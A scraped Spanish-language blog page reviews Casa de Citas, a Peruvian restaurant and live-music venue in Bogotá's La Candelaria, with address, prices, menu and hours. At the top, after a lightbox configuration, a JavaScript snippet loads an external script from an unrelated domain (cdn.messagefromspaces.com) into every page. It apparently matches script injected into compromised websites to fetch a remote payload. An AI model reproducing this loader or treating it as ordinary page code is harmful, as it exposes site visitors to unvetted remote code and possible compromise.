, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Casa de Citas

Escrito por || 11 enero, 2013 en Restaurante Familiar - Sin comentarios
Casa de Citas.

Dirección: Cra. 3 # 12b-35
Zona:
La Candelaria
Precio Promedio Plato por Persona:  Entre 20.000  y 30.000 pesos
Formas de Pago: 
Reciben Todas las Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Categoría: Peruano

Situado estratégicamente en el nuevo boom gastronómico de Bogotá, en pleno centro histórico de La Candelaria, Casa de Citas es un lugar de tradición que reúne excelente música, tradición cultural y exquisita gastronomía peruana.

Ideal como plan vacacional para disfrutar una visita al centro histórico de la ciudad y deleitarse con una cocina latina, picante y exótica como la peruana. Además sus visitantes tienen la oportunidad de conocer ‘la casa de los músicos y de los poetas’ ya que bordea los 20 años de constante trabajo auspiciando el lucimiento de reconocidos y talentosos artistas con presentaciones en vivo, cumpliendo un papel vital en la formación de públicos de géneros musicales como el jazz, el son, la salsa y la música colombiana. La más reciente apuesta de Casa de Citas ha sido todo un éxito al ofrecer la deliciosa y preciada gastronomía peruana, en un espacio agradable para el encuentro de expresiones vivas del arte y la cultura. Respecto a la carta, se ofrece la variedad tradicional de platos peruanos: Ceviche, Lomo y mariscos saltados, Cau Cau, Jalea de Mariscos acompañados de la tradicional chicha peruana. Por todas éstas razones, se ha consolidado el slogan: “El que viene a Casa de Citas está apoyando un proyecto cultural”.

Horarios:
Lunes a Jueves de 12:00 p.m. a 10:00 p.m.
Viernes y Sábados de 12:00 p.m. a 12:00 a.m.
Domingos de 12:00 p.m. a 5:00 p.m

Plato

Comedor

Platos

Deja un comentario